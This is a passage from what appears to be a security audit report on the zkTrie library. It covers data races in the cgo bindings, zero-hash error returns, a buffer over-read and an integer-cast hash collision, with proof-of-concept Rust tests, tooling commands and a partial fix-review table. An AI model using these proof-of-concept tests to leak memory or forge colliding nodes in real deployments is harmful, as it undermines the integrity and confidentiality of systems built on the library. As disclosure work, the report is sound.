Note that the only potential data race comes from multi-threaded initialization, which contradicts the usage recommendation in the README, shown in figure 15.5.

We must init the crate with a poseidon hash scheme before any actions: … zktrie_util::init_hash_scheme(hash_scheme);

Figure 15.5: README.md#8–24

Recommendations
Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go.
Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the “How Safe and Unsafe Interact” section of the Rustonomicon.
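The short-term recommendation could be implemented along the following lines. This is a sketch only: it guards the whole cgo initialization with a Go-side sync.Once (the variable name is ours) rather than synchronizing the C code directly:

// A package-level Once (illustrative) ensures that the unsynchronized
// C-side write in init_hash_scheme happens at most once, even if
// InitHashScheme is called from multiple threads.
var initHashSchemeOnce sync.Once

//export InitHashScheme
func InitHashScheme(f unsafe.Pointer) {
    initHashSchemeOnce.Do(func() {
        hash_f := C.hashF(f)
        C.init_hash_scheme(hash_f)
        zkt.InitHashScheme(hash_external)
    })
}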
16. Safe-Rust ZkMemoryDb interface is not thread-safe
Severity: High
Difficulty: High
Type: Undefined Behavior
Finding ID: TOB-ZKTRIE-16
Target: lib.go, src/lib.rs, trie/zk_trie_database.go

Description
The Go function Database.Init, shown in figure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required.

// Init flush db with batches of k/v without locking
func (db *Database) Init(k, v []byte) {
    db.db[string(k)] = v
}

Figure 16.1: trie/zk_trie_database.go#40–43

However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (figure 16.2) via the cgo function InitDbByNode (figure 16.3):

pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> {
    let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) };
    if ret_ptr.is_null() {
        Ok(())
    } else {
        Err(ret_ptr.into())
    }
}

Figure 16.2: src/lib.rs#171–178

// flush db with encoded trie-node bytes
//export InitDbByNode
func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char {
    h := cgo.Handle(pDb)
    db := h.Value().(*trie.Database)
    bt := C.GoBytes(unsafe.Pointer(data), sz)
    n, err := trie.DecodeSMTProof(bt)
    if err != nil {
        return C.CString(err.Error())
    } else if n == nil {
        //skip magic string
        return nil
    }
    hash, err := n.NodeHash()
    if err != nil {
        return C.CString(err.Error())
    }
    db.Init(hash[:], n.CanonicalValue())
    return nil
}

Figure 16.3: lib.go#147–170

Safe Rust is required to never invoke undefined behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undefined behavior through that wrapper. (Refer to the “How Safe and Unsafe Interact” section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rust’s borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl.

pub fn new_trie(&mut self, root: &Hash) -> Option<ZkTrie> {
    let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) };
    if ret.is_null() {
        None
    } else {
        Some(ZkTrie { trie: ret })
    }
}

Figure 16.4: src/lib.rs#181–189

func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t {
    h := cgo.Handle(pDb)
    db := h.Value().(*trie.Database)
    root := C.GoBytes(unsafe.Pointer(root_c), 32)
    zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db)
    if err != nil {
        return 0
    }
    return C.uintptr_t(cgo.NewHandle(zktrie))
}

Figure 16.5: lib.go#174–185

func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) {
    return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels)
}

// NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one
// will open that one, if not, will create a new one.
func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) {
    mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true}
    mt.rootHash = root
    if *root != zkt.HashZero {
        _, err := mt.GetNode(mt.rootHash)
        if err != nil {
            return nil, err
        }
    }
    return &mt, nil
}

Figure 16.6: trie/zk_trie_impl.go#56–72

Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get() in another, one can trigger a data race from safe Rust.

Exploit Scenario
A Rust-based library consumer uses threads to improve performance. Relying on Rust’s type system, they assume that thread safety has been enforced, and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes.

Recommendations
Short term, add synchronization to Database.Init, such as by calling db.lock.Lock().
Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the “How Safe and Unsafe Interact” section of the Rustonomicon.
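A sketch of the short-term recommendation is shown below. Note that the actual fix (per appendix G) instead replaced callers' use of Init with the thread-safe Put; db.lock here is the mutex suggested by the report's db.lock.Lock() hint:

// Init with the suggested synchronization: the map write is now guarded,
// so concurrent calls from safe Rust can no longer race.
func (db *Database) Init(k, v []byte) {
    db.lock.Lock()
    defer db.lock.Unlock()
    db.db[string(k)] = v
}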
17. Some Node functions return the zero hash instead of errors
Severity: Informational
Difficulty: N/A
Type: Error Reporting
Finding ID: TOB-ZKTRIE-17
Target: lib.go, trie/zk_trie_node.go

Description
The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1).

case NodeTypeEmpty: // Zero
    n.nodeHash = &zkt.HashZero
default:
    n.nodeHash = &zkt.HashZero
}
}
return n.nodeHash, nil

Figure 17.1: trie/zk_trie_node.go#149–155

In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2.

func (n *Node) ValueHash() (*zkt.Hash, error) {
    if n.Type != NodeTypeLeaf {
        return &zkt.HashZero, nil
    }

Figure 17.2: trie/zk_trie_node.go#160–163

In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil.

Recommendations
Short term, have the functions return an error in these cases instead of the zero hash.
Long term, ensure that exceptional cases lead to non-nil error returns rather than default values.
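A minimal sketch of the short-term recommendation; ErrInvalidNodeType and valueHashChecked are hypothetical names, not part of the zktrie API:

// Instead of silently mapping invalid or non-leaf nodes to the zero hash,
// surface them as errors so callers cannot mistake them for valid results.
var ErrInvalidNodeType = errors.New("zktrie: invalid node type")

// valueHashChecked sketches the recommended behavior for Node.ValueHash.
func (n *Node) valueHashChecked() (*zkt.Hash, error) {
    if n.Type != NodeTypeLeaf {
        return nil, ErrInvalidNodeType // previously: return &zkt.HashZero, nil
    }
    return n.ValueHash()
}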
18. get_account can read past the buffer
Severity: High
Difficulty: Medium
Type: Data Exposure
Finding ID: TOB-ZKTRIE-18
Target: lib.rs

Description
The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information.

In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes, depending on whether they include one or two code hashes. Storage values, on the other hand, always have a size of 32 bytes.

The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buffer. This is shown in figure 18.4.

// get account data from account trie
pub fn get_account(&self, key: &[u8]) -> Option<AccountData> {
    self.get::<ACCOUNTSIZE>(key).map(|arr| unsafe {
        std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr)
    })
}

Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230–235)

// all errors are reduced to "not found"
fn get<const T: usize>(&self, key: &[u8]) -> Option<[u8; T]> {
    let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) };
    if ret.is_null() {
        None
    } else {
        Some(must_get_const_bytes::<T>(ret))
    }
}

Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214–223)

fn must_get_const_bytes<const T: usize>(p: *const u8) -> [u8; T] {
    let bytes = unsafe { std::slice::from_raw_parts(p, T) };
    let bytes = bytes
        .try_into()
        .expect("the buf has been set to specified bytes");
    unsafe { FreeBuffer(p.cast()) }
    bytes
}

Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p. (zktrie/src/lib.rs#100–107)

#[test]
fn get_account_overflow() {
    let storage_key =
        hex::decode("0000000000000000000000000000000000000000000000000000000000000000")
            .unwrap();
    let storage_data = [10u8; 32];
    init_hash_scheme(hash_scheme);
    let mut db = ZkMemoryDb::new();
    let root_hash = Hash::from([0u8; 32]);
    let mut trie = db.new_trie(&root_hash).unwrap();
    trie.update_store(&storage_key, &storage_data).unwrap();
    println!("{:?}", trie.get_account(&storage_key).unwrap());
}

// Sample output (picked from a sample of ten runs):
// [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]

Figure 18.4: This is a proof-of-concept demonstrating the buffer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes with the last 96 bytes being over-read.

Exploit Scenario
Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out of bounds.

Recommendations
Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings.
Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues.

19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation
Severity: High
Difficulty: Medium
Type: Data Validation
Finding ID: TOB-ZKTRIE-19
Target: lib.rs

Description
A set of unchecked integer casting operations can lead to hash collisions and runtime errors reachable from the public Rust interface. The Rust library regularly needs to convert an input byte array's length from the usize type to the c_int type. Depending on the architecture, these types might differ in size and signedness. This difference allows an attacker to provide an array with a maliciously chosen length that will be cast to a different number.

The attacker can manipulate the array so that its length is cast to a smaller value than the actual array length, allowing the attacker to create two leaf nodes from different byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function.

The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse:

impl ZkTrieNode {
    pub fn parse(data: &[u8]) -> Self {
        Self {
            trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) },
        }
    }

Figure 19.1: zktrie/src/lib.rs#133–138

To achieve a collision for nodes constructed from different byte arrays, first observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that share a common prefix and are then padded to that length with different bytes will cause the Go library to interpret only the common prefix of these nodes. The following test showcases this exploit.

#[test]
fn invalid_cast() {
    init_hash_scheme(hash_scheme);

    // common prefix
    let nd = &hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap();

    // create node1 with prefix padded by zeroes
    let mut vec_nd = nd.to_vec();
    let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2];
    vec_nd.append(&mut zero_padd_data);
    let node1 = ZkTrieNode::parse(&vec_nd);

    // create node2 with prefix padded by ones
    let mut vec_nd = nd.to_vec();
    let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2];
    vec_nd.append(&mut one_padd_data);
    let node2 = ZkTrieNode::parse(&vec_nd);

    // create node3 with just the prefix
    let node3 = ZkTrieNode::parse(&hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap());

    // all hashes are equal
    assert_eq!(node1.node_hash(), node2.node_hash());
    assert_eq!(node1.node_hash(), node3.node_hash());
}

Figure 19.2: A test showing three different leaf nodes with colliding hashes

This finding also allows an attacker to cause a runtime error by choosing a data array whose length causes the cast to result in a negative number. Figure 19.3 shows a test that triggers the runtime error for the parse function:

#[test]
fn invalid_cast() {
    init_hash_scheme(hash_scheme);
    let data = vec![0u8; c_int::MAX as usize + 1];
    println!("{:?}", data.len() as c_int);
    let _nd = ZkTrieNode::parse(&data);
}

// running 1 test
// -2147483648
// panic: runtime error: gobytes: length out of range
// goroutine 17 [running, locked to thread]:
// main._Cfunc_GoBytes(...)
//     _cgo_gotypes.go:102
// main.NewTrieNode.func1(0x14000062de8?, 0x80000000)
//     /zktrie/lib.go:78 +0x50
// main.NewTrieNode(0x14000062e01?, 0x2680?)
//     /zktrie/lib.go:78 +0x1c

Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array

Exploit Scenario
An attacker provides two different byte arrays that have the same node_hash, breaking the assumption that such nodes are hard to obtain.

Recommendations
Short term, have the code perform the cast in a checked manner by using the c_int::try_from method, which allows validating whether the conversion succeeds. Determine whether the Rust functions should allow arbitrary-length inputs; document the length requirements and assumptions.
Long term, regularly run Clippy in pedantic mode to find and fix all potentially dangerous casts.
A. Vulnerability Categories
The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.

Vulnerability Categories
Category | Description
Access Controls | Insufficient authorization or assessment of rights
Auditing and Logging | Insufficient auditing of actions or logging of problems
Authentication | Improper identification of users
Configuration | Misconfigured servers, devices, or software components
Cryptography | A breach of system confidentiality or integrity
Data Exposure | Exposure of sensitive information
Data Validation | Improper reliance on the structure or values of data
Denial of Service | A system failure with an availability impact
Error Reporting | Insecure or insufficient reporting of error conditions
Patching | Use of an outdated software package or library
Session Management | Improper identification of authenticated users
Testing | Insufficient test methodology or test coverage
Timing | Race conditions or other order-of-operations flaws
Undefined Behavior | Undefined behavior triggered within the system

Severity Levels
Severity | Description
Informational | The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined | The extent of the risk was not determined during this engagement.
Low | The risk is small or is not one the client has indicated is important.
Medium | User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High | The flaw could affect numerous users and have serious reputational, legal, or financial implications.

Difficulty Levels
Difficulty | Description
Undetermined | The difficulty of exploitation was not determined during this engagement.
Low | The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium | An attacker must write an exploit or will need in-depth knowledge of the system.
High | An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.

B. Code Maturity Categories
The following tables describe the code maturity categories and rating criteria used in this document.

Code Maturity Categories
Category | Description
Arithmetic | The proper use of mathematical operations and semantics
Complexity Management | The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management | The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Data Handling | The safe handling of user inputs and data processed by the system
Documentation | The presence of comprehensive and readable codebase documentation
Maintenance | The timely maintenance of system components to mitigate risk
Memory Safety and Error Handling | The presence of memory safety and robust error-handling mechanisms
Testing and Verification | The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage

Rating Criteria
Rating | Description
Strong | No issues were found, and the system exceeds industry standards.
Satisfactory | Minor issues were found, but the system is compliant with best practices.
Moderate | Some issues that may affect system safety were found.
Weak | Many issues that affect system safety were found.
Missing | A required component is missing, significantly affecting system safety.
Not Applicable | The category is not applicable to this review.
Not Considered | The category was not considered in this review.
Further Investigation Required | Further investigation is required to reach a meaningful conclusion.
C. Code Quality Findings
We identified the following code quality issues through manual and automatic code review.

● Unnecessary parentheses on function call.

// NewSecure creates a trie
// SecureBinaryTrie bypasses all the buffer mechanism in *Database, it directly uses the
// underlying diskdb
func NewZkTrie(root zkt.Byte32, db ZktrieDatabase) (*ZkTrie, error) {
    maxLevels := NodeKeyValidBytes * 8
    tree, err := NewZkTrieImplWithRoot((db), zkt.NewHashFromBytes(root.Bytes()), maxLevels)

Figure C.1: zktrie/trie/zk_trie.go#49–54

● Typo in code comment.

// reduce 2 fieds into one

Figure C.2: types/util.go#L8-L8

● Copy-pasted code comment.

// ErrNodeKeyAlreadyExists is used when a node key already exists.
ErrInvalidField = errors.New("Key not inside the Finite Field")

Figure C.3: zktrie/trie/zk_trie_impl.go#20–21

● Empty if branch.

if e != nil {
    //fmt.Println("err on NodeTypeEmpty mt.addNode ", e)
}
return r, e

Figure C.4: zktrie/trie/zk_trie_impl.go#190–193

● Superfluous nil error check.

if err != nil {
    return err
}
return nil

Figure C.5: zktrie/trie/zk_trie_impl.go#120–

● Potential panic in function returning Result. Instead, the function should return a Result with the appropriate message.

pub fn update_account(
    &mut self,
    key: &[u8],
    acc_fields: &AccountData,
) -> Result<(), ErrString> {
    let acc_buf: &[u8; FIELDSIZE * ACCOUNTFIELDS] = unsafe {
        let ptr = acc_fields.as_ptr();
        ptr.cast::<[u8; FIELDSIZE * ACCOUNTFIELDS]>()
            .as_ref()
            .expect("casted ptr can not be null")

Figure C.6: zktrie/src/lib.rs#279–288

● Typo in code comment.

// ValuePreimage can store at most 256 byte32 as fields (represnted by BIG-ENDIAN integer)

Figure C.7: “represnted” should be “represented” (zktrie/trie/zk_trie_node.go#41)

● Redundant error handling. The following code should simply check whether err != nil and then return nil, err.

if err == ErrKeyNotFound {
    return nil, ErrKeyNotFound
} else if err != nil {
    return nil, err
}

Figure C.8: zktrie/trie/zk_trie_impl.go#508–512

● Typo in variable name. The variables should read FIELD instead of FILED.

static FILED_ERROR_READ: &str = "invalid input field";
static FILED_ERROR_OUT: &str = "output field fail";

Figure C.9: zktrie/src/lib.rs#309–310

● The difference between NewHashFromBytes and NewHashFromCheckedBytes is not explicitly documented. NewHashFromBytes truncates its input, while NewHashFromCheckedBytes returns an error if the input is the wrong length.

// NewHashFromBytes returns a *Hash from a byte array considered to be
// a represent of big-endian integer, it swapping the endianness
// in the process.
func NewHashFromBytes(b []byte) *Hash {
    var h Hash
    copy(h[:], ReverseByteOrder(b))
    return &h
}

// NewHashFromCheckedBytes is the intended method to get a *Hash from a byte array
// that previously has ben generated by the Hash.Bytes() method. so it check the
// size of bytes to be expected length
func NewHashFromCheckedBytes(b []byte) (*Hash, error) {
    if len(b) != HashByteLen {
        return nil, fmt.Errorf("expected %d bytes, but got %d bytes", HashByteLen, len(b))
    }
    return NewHashFromBytes(b), nil
}

Figure C.10: types/hash.go#111–128
● Unclear comment. The “create-delete issue” should be documented.

//mitigate the create-delete issue: do not delete unexisted key

Figure C.11: trie/zk_trie.go#118

● TrieDelete swallows errors. This error should be propagated to the Rust bindings like other error returns.

// delete leaf, silently omit any error
//export TrieDelete
func TrieDelete(p C.uintptr_t, key_c *C.uchar, key_sz C.int) {
    h := cgo.Handle(p)
    tr := h.Value().(*trie.ZkTrie)
    key := C.GoBytes(unsafe.Pointer(key_c), key_sz)
    tr.TryDelete(key)
}

Figure C.12: lib.go#243–

D. Automated Analysis Tool Configuration
As part of this assessment, we used the tools described below to perform automated testing of the codebase.

D.1. golangci-lint
We used the static analyzer aggregator golangci-lint to quickly analyze the codebase.

D.2. Semgrep
We used the static analyzer Semgrep to search for weaknesses in the source code repository. Note that these rule sets will output repeated results, which should be ignored.

git clone git@github.com:dgryski/semgrep-go.git
git clone https://github.com/0xdea/semgrep-rules
semgrep --metrics=off --sarif --config p/r2c-security-audit
semgrep --metrics=off --sarif --config p/trailofbits
semgrep --metrics=off --sarif --config https://semgrep.dev/p/gosec
semgrep --metrics=off --sarif --config https://raw.githubusercontent.com/snowflakedb/gosnowflake/master/.semgrep.yml
semgrep --metrics=off --sarif --config semgrep-go
semgrep --metrics=off --sarif --config semgrep-rules

Figure D.1: The commands used to run Semgrep

D.3. CodeQL
We analyzed the Go codebase with Trail of Bits’ private CodeQL queries. We recommend that Scroll review CodeQL’s licensing policies if it intends to run CodeQL.

# Create the go database
codeql database create codeql.db --language=go
# Run all go queries
codeql database analyze codeql.db --additional-packs ~/.codeql/codeql-repo --format=sarif-latest --output=codeql_tob_all.sarif -- tob-go-all

Figure D.2: Commands used to run CodeQL

D.4. go cover
We ran the go cover tool with the following command on both the trie and types folders to obtain a test coverage report:

go test -cover -coverprofile c.out && go tool cover -html=c.out

Note that this needs to be run separately for each folder.

D.5. cargo audit
This tool audits Cargo.lock against the RustSec advisory database. It did not reveal any findings but should be run every time new dependencies are included in the codebase.

D.6. cargo-llvm-cov
cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command to generate a coverage report for the Rust tests.

D.7. Clippy
The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool. Clippy warns about the casting operations from usize to c_int that resulted in finding TOB-ZKTRIE-19.
E. Go Fuzzing Harness
During the assessment, we wrote a fuzzing harness for the Merkle tree proof verifier function. Because native Go fuzzing does not support all necessary types, some proof structure types had to be manually constructed. Some parts of the proof were built naively, and the fuzzing harness can be iteratively improved by Scroll’s team. Running the go test -fuzz=FuzzVerifyProofZkTrie command will start the fuzzing campaign.

// Truncate or pad array to length sz
func padtolen(arr []byte, sz int) []byte {
    if len(arr) < sz {
        arr = append(arr, bytes.Repeat([]byte{0}, sz-len(arr))...)
    } else {
        arr = arr[:sz]
    }
    return arr
}

func FuzzVerifyProofZkTrie(f *testing.F) {
    zkTrie, _ := newZkTrieImpl(NewZkTrieMemoryDb(), 10)
    k := zkt.NewHashFromBytes(bytes.Repeat([]byte("a"), 32))
    vp := []zkt.Byte32{*zkt.NewByte32FromBytes(bytes.Repeat([]byte("b"), 32))}
    node := NewLeafNode(k, 1, vp)
    f.Fuzz(func(t *testing.T, existence bool, depth uint, notempties []byte,
        siblings []byte, nodeAuxA []byte, nodeAuxB []byte) {
        notempties = padtolen(notempties, 30)
        typedsiblings := make([]*zkt.Hash, 10)
        for i := range typedsiblings {
            typedsiblings[i] = zkt.NewHashFromBytes(padtolen(siblings, 32))
        }
        typedata := [30]byte{}
        copy(typedata[:], notempties)
        var nodeAux *NodeAux
        if !existence {
            nodeAux = &NodeAux{
                Key:   zkt.NewHashFromBytes(padtolen(nodeAuxA, 32)),
                Value: zkt.NewHashFromBytes(padtolen(nodeAuxB, 32)),
            }
        }
        proof := &Proof{
            Existence:  existence,
            depth:      depth,
            notempties: typedata,
            Siblings:   typedsiblings,
            NodeAux:    nodeAux,
        }
        if VerifyProofZkTrie(zkTrie.rootHash, proof, node) {
            panic("valid proof")
        }
    })
}

Figure E.1: The fuzzing harness for VerifyProofZkTrie
F. Go Randomized Test
During the assessment, we wrote a simple randomized test to verify that the behavior of the zkTrie matches an ideal tree (i.e., an associative array). The test currently fails due to the verifier misbehavior described in this report. The test can be run with go test -v -run TestZkTrie_BasicRandomTest.

// Basic randomized test to verify the trie's set, get, and remove features.
func TestZkTrie_BasicRandomTest(t *testing.T) {
    root := zkt.Byte32{}
    db := NewZkTrieMemoryDb()
    zkTrie, err := NewZkTrie(root, db)
    assert.NoError(t, err)
    idealTrie := make(IdealTrie)
    const NUM_BYTES = 32
    const NUM_KEYS = 1024
    keys := random_hex_str_array(t, NUM_BYTES, NUM_KEYS)
    data := random_hex_str_array(t, NUM_BYTES, NUM_KEYS)
    // PHASE 1: toss a coin and set elements (Works)
    for i := 0; i < len(keys); i++ {
        if toss(t) == true {
            set(t, zkTrie, idealTrie, keys[i], data[i])
        }
    }
    // PHASE 2: toss a coin and get elements (Fails)
    for i := 0; i < len(keys); i++ {
        if toss(t) == true {
            get(t, zkTrie, idealTrie, keys[i])
        }
    }
    // PHASE 3: toss a coin and remove elements (Fails)
    for i := 0; i < len(keys); i++ {
        if toss(t) == true {
            remove(t, zkTrie, idealTrie, keys[i])
        }
    }
}

Figure F.1: A basic randomized test for ZkTrie (trie/zk_trie_test.go)

type IdealTrie = map[string][]byte

func random_hex_str(t *testing.T, str_bytes int) string {
    outBytes := make([]byte, str_bytes)
    n, err := rand.Read(outBytes)
    assert.NoError(t, err)
    assert.Equal(t, n, str_bytes)
    return hex.EncodeToString(outBytes)
}

func random_hex_str_array(t *testing.T, str_bytes int, array_size int) []string {
    out := []string{}
    for i := 0; i < array_size; i++ {
        hex_str := random_hex_str(t, str_bytes)
        out = append(out, hex_str)
    }
    return out
}

// Randomly returns true or false
func toss(t *testing.T) bool {
    n, err := rand.Int(rand.Reader, big.NewInt(2))
    assert.NoError(t, err)
    return (n.Cmp(big.NewInt(1)) == 0)
}

func hex_to_bytes(t *testing.T, hex_str string) []byte {
    key, err := hex.DecodeString(hex_str)
    assert.NoError(t, err)
    return key
}

func bytes_to_byte32(b []byte) []zkt.Byte32 {
    if len(b)%32 != 0 {
        panic("unaligned arrays are unsupported")
    }
    l := len(b) / 32
    out := make([]zkt.Byte32, l)
    i := 0
    for i < l {
        copy(out[i][:], b[i*32:(i+1)*32])
        i += 1
    }
    return out
}

// Tests that an inclusion proof for a given key can be generated and verified.
func verify_inclusion(t *testing.T, zkTrie *ZkTrie, key []byte) {
    lvl := 100
    secureKey, err := zkt.ToSecureKey(key)
    assert.NoError(t, err)
    proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode)
    assert.NoError(t, err)
    valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node)
    assert.True(t, valid)
    hash, err := proof.Verify(node.nodeHash, node.NodeKey)
    assert.NoError(t, err)
    assert.NotNil(t, hash)
}

// Tests that a non-inclusion proof for a given key can be generated and verified.
func verify_noninclusion(t *testing.T, zkTrie *ZkTrie, key []byte) {
    lvl := 100
    secureKey, err := zkt.ToSecureKey(key)
    assert.NoError(t, err)
    proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode)
    assert.NoError(t, err)
    valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node)
    assert.False(t, valid)
    hash, err := proof.Verify(node.nodeHash, node.NodeKey)
    assert.Error(t, err)
    assert.Nil(t, hash)
}

// Verifies that adding elements to the trie works.
func set(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string, data_hex string) {
    vFlag := uint32(1)
    key := hex_to_bytes(t, key_hex)
    data := hex_to_bytes(t, data_hex)
    err := zkTrie.TryUpdate(key, vFlag, bytes_to_byte32(data))
    assert.NoError(t, err)
    idealTrie[key_hex] = data
    verify_inclusion(t, zkTrie, key)
}

// Verifies that retrieving elements from the trie works.
func get(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) {
    key := hex_to_bytes(t, key_hex)
    ideal_data, ok := idealTrie[key_hex]
    if ok {
        trie_data, err := zkTrie.TryGet(key)
        assert.NoError(t, err)
        assert.True(t, reflect.DeepEqual(trie_data, ideal_data))
        verify_inclusion(t, zkTrie, key)
    } else {
        _, err := zkTrie.TryGet(key)
        assert.Equal(t, ErrKeyNotFound, err)
        verify_noninclusion(t, zkTrie, key)
    }
}

// Verifies that removing elements from the trie works.
func remove(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) {
    key := hex_to_bytes(t, key_hex)
    _, ok := idealTrie[key_hex]
    if ok {
        delete(idealTrie, key_hex)
        err := zkTrie.TryDelete(key)
        assert.NoError(t, err)
    } else {
        _, err := zkTrie.TryGet(key)
        assert.Equal(t, ErrKeyNotFound, err)
    }
    verify_noninclusion(t, zkTrie, key)
}

Figure F.2: Helper functions for TestZkTrie_BasicRandomTest (trie/zk_trie_test.go)

G. Fix Review Results
When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system.

On September 13, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. Trail of Bits received fix PRs for findings TOB-ZKTRIE-1, TOB-ZKTRIE-4, TOB-ZKTRIE-5, TOB-ZKTRIE-16, TOB-ZKTRIE-18, and TOB-ZKTRIE-19. Scroll did not provide fix PRs for the medium-severity findings TOB-ZKTRIE-2, TOB-ZKTRIE-10, and TOB-ZKTRIE-12; the low-severity finding TOB-ZKTRIE-11; or the remaining findings, all of which are of informational severity.

In summary, of the 19 issues described in this report, Scroll has resolved five issues and has partially resolved one issue. No fix PRs were provided for the remaining 13 issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below.
ID | Title | Status
1 | Lack of domain separation allows proof forgery | Resolved
2 | Lack of proof validation causes denial of service on the verifier | Undetermined
3 | Two incompatible ways to generate proofs | Undetermined
4 | BuildZkTrieProof does not populate NodeAux.Value | Resolved
5 | Leaf nodes with different values may have the same hash | Resolved
6 | Empty UpdatePreimage function body | Undetermined
7 | CanonicalValue is not canonical | Undetermined
8 | ToSecureKey and ToSecureKeyBytes implicitly truncate the key | Undetermined
9 | Unused key argument on the bridge_prove_write function | Undetermined
10 | The PreHandlingElems function panics with an empty elems array | Undetermined
11 | The hash_external function panics with integers larger than 32 bytes | Undetermined
12 | Mishandling of cgo.Handles causes runtime errors | Undetermined
